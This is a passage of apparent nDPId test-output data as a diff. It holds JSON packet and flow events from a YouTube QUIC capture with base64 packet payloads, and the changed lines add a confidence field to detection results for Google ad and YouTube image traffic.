 02247{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1489363823466,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1489363823466,"pkt":"gCqojWksxCwDBkn+CABFAAViKp8AAEARAADAqAEH2DrNQtbVAbsFTmyMDZNw4V58RG0IUTAzNQHEx\/Yat8K2lJx\/xfCgAQAEQ0hMTx0AAABQQUQABgEAAFNOSQAjAQAAU1RLAF0BAABWRVIAYQEAAENDUwBxAQAATk9OQ5EBAABNU1BDlQEAAEFFQUSZAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLXBhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tfyKC9MwN17piZVNU\/QkmmE3zDBRwXexEviTXtQHZlZT\/o0M3FJ3WOBZp5lL5RXIaTAX\/iszgW7Ui51EwMzUB6IFgkpIa6H7tgIaiFYKRWMXjbzAwMDAwMDAwAGp0dp4RQa9ev39thoVizX7vQxRkAAAAQ0MyMGJldGEgQ2hyb21lLzU3LjAuMjk4Ny45OCBJbnRlbCBNYWMgT1MgWCAxMF8xMl8za3Zj9RsCsgRL78LWSY4+jwAAAABYNTA5AAAQAAEAAAAeAAAAb+PFWAAAAABoJX9SS1LMMIZlh9cGt32w74KlkbfLCJvYbB6phUnjYtV\/J7+3T+WICkKGmxl0apInEplRSWcqg\/3qI+CqJwNXZAAAAAEAAABDMjU1HvdI4XZwU8Me90jhdnBTwz2t9HxBefiRQAt7kKmuees2jgEAnGVpdpNkhQuOQ0r1tyTPo1k8IEM71wOV+MDwud\/WmN8O\/bZt8M5S76zS6GQgUAsZfJUzhYMLh2DzCj0s2UxZDpdWlDQ\/KBiEO80tVmE+bGp5czdFQGnhi\/134fgolaoUotcrvEChNXZdSQ7ze+ZsVxVgDQIPLJn5KItVO0bNTbdFJlK9ck\/6gUes9AlK+Lowm7raNBTPfJpo34tpsNA3toSRqnAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823466,"flow_last_seen":1489363823466,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1489363823466,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823466,"flow_last_seen":1489363823466,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1489363823466,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}}
 00957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1489363823467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":427,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":427,"pkt_l4_len":393,"ts_msec":1489363823467,"pkt":"gCqojWksxCwDBkn+CABFAAGdQ1YAAEARAADAqAEH2DrNQtbVAbsBiWjHDZNw4V58RG0IUTAzNQIjOTX0HE3l5Scr7Fgx2f\/r+qyKcH\/8LtiyPftQGYB9rCN29+bVRC8cQk9\/xGvEd6aBS8oqh8NZIxXxQWKlTa8RiJV0BMsIA0J2xai1sihftSstpiUm4Hfb5ePoNWBO9sfumkF4vn\/9w\/9icDJdGccA4OzurorhUAKZSZXQ2C+f4aKf6nX2PELscDc2K8rYtLquJGdtKf4c79ur+nT\/zIZbwAI5FHcm2kTejfWn+vqhJAD0GuZjr1fez\/qk2C34VbRcKzU+r3sMaPUtMdGtgzscnCkXVApYI9m9bd3dzj+CzxW8qOJ7mCU2emBxJ\/DIq4W6MZVOQ8P1s290Mflqj2Ld8WgZbVsDG+nGkhewE4Z8dkUPa+UkVgjTddS58Gokmrg9Z3Adl+QFItNyGTCZv48hVxEemek454JnWb6oZl4ujKpXhQA0CaX5LNroX5y5o\/Wny9SJ17j8aIxrDR0s65vzthwadNOZLJ62NA+MTWY0IQjOuA=="}
 02261{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1489363823527,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1489363823527,"pkt":"xCwDBkn+gCqojWksCABFAAViAABAADcR117YOs1CwKgBBwG71tUFTuocBCh3B7XiTuKXN4LFlWznTXqPOMTIP1YB45lXi+l5CF8JASyEKKaDONFN5YR3rA\/p9CKVXhUMWNxz3dKUg1yQftOAuLAuCFZHEo433jmLn2X4f\/Owuck2m9UesvdXoxzwq4xDpUXHvNH9PzNMS1XtEZ0KDZ904pHEN+ZkjUiA2jK\/AWrBBVjEsqHcAMngSVXjIyTLuIfTfT50KGoQr9mSm5SWUDtU4w+2DwTLde4slXrVb5tsrZJ9hx6FXeBCOwNcjEoeHA7do276\/9KH1k58X3zu+PQcEwnHQBIs5Nvjxz0m7lZ\/e4WfsWAx90HOH6likwa4aRKygVjLaiXObj1BRuaQFXdbITUHeb\/v1Bb0ex9qIwx0kcogAUVq6KGcRlImR2VCET7Q2UPfBF1HkA3bAqvJ6t1BP07HS8IKIEm70QgionKkRzGiFzdUhT09R6zdeXllUpiA63fBrBRfZD4ih6nX4zo\/yc\/lz+z\/tYWWCPtitjIx3R+MsYy6evVwKHmKh4xLbNgtf6Bu5FREacax96iyQP2\/vuAdKPy+I6gMbTz04jy4zg2nTKOKHNa3aAGNL9B3Uh5t6mqJXuzsLfLLTPDw3wrJPan+M\/0XoefuuxvaucM7CeSe1bcynXGH+VeCKK3X6BEjxAIAyaIH3WN4GasKfIjmi2abIP71bMldE4Rrc0QpuysWWFnpQQt9pN2sP40R1CWaJEjWn2UIOe0P10GgnLa0xDEY45T4mm1G5cRaybTY1lDhwEfyXyWZ9AZfiHELWMCRxQrjRsfwPjDlL6jHi\/zHIUWOI\/T4jgDqU2KclKtGJHvbzyipTcTSry1Z9gmEkVPVvz\/8EjMnwGHjnltQ6Dn6FOkOgVFgA2iD5qiIgNLtjkUfH1GBvC5KbT9MfqpK2j2k4rSt9zbnBWSsgHnKyvlhVlk4OSMFjMkESHpv2MoP7kPpHn9hYZR+DGSK3WZiE2JTywLeaTFpsQZ3daTQq1Vr04zxtlC9vRWSZgVtzp+73FUoayEpGTdeO3UERRAep7Gz6OHwglh0vTs4C4cI3glPhuREbf69JIx21MPWU3j5sPCPzg7nPp1rI9ewTvRn38IUIjcvV1KuUH4IRVmz5W6wsHwHFtnkwFNuxtYxLxpK0EDIngGp5d6ht7210ydmiQr6O0ON8qJtc3t5+jXn6ntXD+RhEqv4GCaMWHbVrUNZALDxj9JvSEzyroxEuoApEO8TL\/ZdVC\/slwR1pM3JdbAsWN2rxIFLM5krFwOakRgi754xhdBEry7MgvTwiHsgDJ3Rg3jSdB9jubcVT3HICTRmj1vR\/GLDAyPIFAzuuaVmpolrsQwDxFuyNGOcjHVBUbeP6bnCaCs1JfK35oan09836\/37ZWojhkKHAUoDUCP0eOYnRmUhbwOggCe7+p8hW83\/lILFNK1NDMAm7qAsqoccxqNT61ke0qmot69NhPXpwpGUt\/gK3nyvFne4lsK7S7r1eMvI29rlDBY0L\/e2MX+l+NFFonVbYbxqlVZxk5h57Py0nXsSE5q43RZq\/Ab5Ljnrfv\/qOWasfLkVsR95Ih7otWzubnTYoOB5dgkPlalnkY+ZT0ynhrpD6iNCVYd4popCzZS+uE59ZqtbLuU6i6Oh3yTkUuBN6l4rJS\/6y1YL+YBtywlzVVi2gqoBTO6RyHcXMeDc6anBpSJn+Y11FC9lfnd1ZBuVxPW\/4cBKWMy9IKMGLXE8iIH1zC\/mEqW8ZtRWLvviks2j2E9BFu9ovslgURdyPBgw2o0Whiqb07OoUWWMBoSXHynCDs+gbza+6qUl"}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823738,"flow_last_seen":1489363823738,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1489363823738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1489363823738,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1489363823738,"pkt":"gCqojWksxCwDBkn+CABFAAVi1UgAAEARAADAqAEH2DrGIdsKAbsFTmVrDWI\/o1o3gkQjUTAzNQG3J1X3HMsKZ2COv5qgARQFQ0hMTxMAAABQQUQA1AMAAFNOSQDhAwAAVkVSAOUDAABDQ1MA9QMAAE1TUEP5AwAAVUFJRCgEAABUQ0lELAQAAFBETUQwBAAAU1JCRjQEAABTTUhMOAQAAElDU0w8BAAAQ1RJTUQEAABOT05QZAQAAE1JRFNoBAAAU0NMU2wEAABDU0NUbAQAAENPUFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0teXQzLmdncGh0LmNvbVEwMzUB6IFgkpIa6H7tgIaiFYKRZAAAAGJldGEgQ2hyb21lLzU3LjAuMjk4Ny45OCBJbnRlbCBNYWMgT1MgWCAxMF8xMl8zAAAAAFg1MDkAABAAAQAAAB4AAABv48VYAAAAADHS1o9J\/TTNQYjpQh1bWy1pxKNWlJuoLy5bOHLwnEpeZAAAAAEAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823738,"flow_last_seen":1489363823738,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1489363823738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823738,"flow_last_seen":1489363823738,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1489363823738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}}
 02252{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1489363823782,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1489363823782,"pkt":"xCwDBkn+gCqojWksCABFAAViAABAADUR4H\/YOsYhwKgBBwG72woFTqYeCGI\/o1o3gkQjAfrje9Hje5P995YFE4ABUkVKAAgAAABTVEsAPAAAAFNOTwB0AAAAUFJPRroAAABTQ0ZHWQEAAFJSRUpdAQAAU1RUTGUBAABDU0NUVwIAAENSVP\/\/BQAA+LXECKXyXyaGkNvk1LnkKe2HcwZSdJKMjSZdwRtRvlgkC7wrIojsxa12VSbQ+UqytsSw5ZWrAguctbN84e+itVKKdDan60SbCn6HO8EhAZXhZCoi6zTXVPfruFP+xbK0jobs4P1ETvvj7642AaRXoyX3AiUwRAIga0VZvCZ3TBiWNQTgv6KY8y2d9RkggowYQwi1RHlUtm4CIDUxV08RC49VVgJORrtGSNh+UsyMA8+5V0kTzoS1\/6EyU0NGRwgAAABBRUFECAAAAFNDSUQYAAAAUERNRBwAAABUQktQIAAAAFBVQlNDAAAAS0VYU0cAAABPQklUTwAAAEVYUFlXAAAAQUVTR0NDMjBrdmP1GwKyBEvvwtZJjj6PQ0hJRFRCMTAgAAC7MI00KZ1MP25xAs8ApFxY\/QSpEMcZP7AIDZmbDnFGD0MyNTUwMDAwMDAwMEDbx1gAAAAADAAAAND3AQAAAAAAAPAAdQDuS723dc5guuFCaR+r4Z5mow9+X7By2IMAxHuJeqj9ywAAAVplaZe7AAAEAwBGMEQCIFrxuSR6yQfoERjhpyCo\/HC4DbnJyy5PDUNSQYvoLd7WAiA1du1k\/DfC+hSnbCFZ+CiZL\/WBsCA2tHRh+V5os9e8wAB3AN3rHSt6DU+mIIuBrYFocH4ujp0B1VyIjT0RxM227L7MAAABWmVpmAsAAAQDAEgwRgIhAK1Z+StuHvhEQzbhrizA0oP28zksTi\/aWkPYynKMWI7wAiEAoZsd0Sdt7uEo3XB3wMmgRGZNny2cfedCYnG3zpLag4YBA37tgIaiFYKRAgAAAAMB6IFgkpIa6AAAAAAAKgcAAHi7gTUtv1NjZwCWXOxKBk1sXJA2HIf55ae2MzL3PkFvyFGxkQUqDMwNjIyMgPkFmJfA7TkDUyC2MDUHdaIKsVrFwcPlDEw3aflFeZmJsATJzsPrm1+aVwJKXWGZqeVwd\/EguwvUlgC5i0dcCximIGFgJilKBqbG1Dxw1BtEGgizsQO9e84W2BLhADOYGdmZnRhYMt6FvD+wnV996Zw\/hsoKnDX1AkfE3LjmrmD0Xbj\/45IfeVee\/OywebVOPSnedOpTyamR\/2zN7jmfePP5sO3s0PyvawoWN7GsN2hiWU2oLGtizgMpEGRpYk4FchKbcLm1SUZLL7GgoBiHrApEtiAfzNUrBqaYxPRUqGJgYi4Gq+LT0kvKyU+HKWsSBPILUIWUtEBUbn4eMKcm4jBGE6QGbLcuVIVuSn55Xk5+Ygq6UnVMpaUF2BQqYChEVwEMgJT80qSc1OSczORs9ADgBoZbekEG3F8QzSnAIioVLAQP1+LKvBRo5QWWEIFJlKcm5WSmQ02Q19IrTkxLzSstwBHgYAV5KUn5FTgUKGrpEQoceYQS7IEioYUrJhFa9YpTgUFSgq6AByVW+dGjWYFgJEvhCWxORFDzowe0KPbgEMISyNrFJcB4SNYrSMwDOiE3Mx9f2hXDIS6LPxz4S\/PSMnOA5VFqil5eankxUtuLvcEgA6kEjwGWQdpIZbM8tLgsyM6EGgoukd09Hd2NwIWvNlJxD1MMDC6gj4sNkXWAqgCk9qDW3+B7S2xzw150iDxJLJ4oWT2f5yFamwi5WMfaiVKENDKAtRxaz4WDjS29kQdYohsYQFpFmgbqBqoLlBco"}
 02247{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1489363823783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1489363823783,"pkt":"xCwDBkn+gCqojWksCABFAAViAABAADUR4H\/YOsYhwKgBBwG72woFTtjVCGI\/o1o3gkQjAl1iY1+IPhyu0ittLaQBLgUZARLyTw62Xo9mQ7Tn55dir+alTNnl+EuTXetgrtU\/li3WZUF3t3EtPfqBg1nJrPp7bar7qdPHbjH8jwhk+pimkWuq6rVs4cviafuTL\/pWbDvkJD1zwixjdUFbM0aGipe63\/v0luly7P6xK4d1\/V35zVlHfZnq9OpLDbRdp3F95Wn77GK+6cqsr8cEfY77RjhzSh7Unhdryl2mU\/IhTPRZgsMXhZ65ayI6rm07a3GnaGsF6wp\/3rLVzcqh63smBXkUr5RrfvOpMsbbX\/13ZPXcymfXdeZ+LWmcELGYmfOd+prGpXeZdtiyB0ssnuZwNOYGp72hD8PxC2ds8mZMXnnvqd7Gb2w82Yw3Hn\/6nvVjXthRi\/UnDQF+1X0RAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363824401,"flow_last_seen":1489363824401,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1489363824401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1489363824401,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1489363824401,"pkt":"gCqojWksxCwDBkn+CABFAAVisIYAAEARAADAqAEH2DrNQtJjAbsFTmyMDXhX73QJ\/9nIUTAzNQGC9mpeAxq6QsMNjNmgAQAEQ0hMTx0AAABQQUQACAEAAFNOSQAjAQAAU1RLAF0BAABWRVIAYQEAAENDUwBxAQAATk9OQ5EBAABNU1BDlQEAAEFFQUSZAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tZ29vZ2xlYWRzLmcuZG91YmxlY2xpY2submV0gCa63gfstks25NXDBda+jRe1AwMuFIPOgLr8Vdt88WUvAddL7KVg5kyrPLEzz5PxZEMuEuhwybaZ0VEwMzUB6IFgkpIa6H7tgIaiFYKRWMXjcDAwMDAwMDAwQoHc+xZQMEvJrifGGZTcfUn5aXxkAAAAQ0MyMGJldGEgQ2hyb21lLzU3LjAuMjk4Ny45OCBJbnRlbCBNYWMgT1MgWCAxMF8xMl8za3Zj9RsCsgRL78LWSY4+jwAAAABYNTA5AAAQAAEAAAAeAAAAcOPFWAAAAACN\/AA7IChJw\/uFk6rkJtT8KHam\/zP1YJxL1R6PGerdhviM0jsqfVXK1sMGRgIfu1Gw5yjD\/\/Q\/fKW3aZLxbK0ZZAAAAAEAAABDMjU1qvorPqjeOwuq+is+qN47Cz2t9HxBefiRQAt7kKmueet+NAEAgygqfGXu0L2syT5vA8mDxoSqG087cDiVovZ6s0ywmTUWtgw5lXy+Ac4T6qWEMJOPvUqVQrabfhIiKh6bU4h\/Diu+B3D3YFOkHFOA3JEmhpJ\/3PZn9DncBSC36LdWvsJ8Uwgl2IG2lc1SfhMotW8c5gE3wCT8YVfQJL1vCNMKzgZWBrzkDiYZ7cTxYUMsLfK1F7K2mD1WVm4PU008ujahjZ6t1bAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA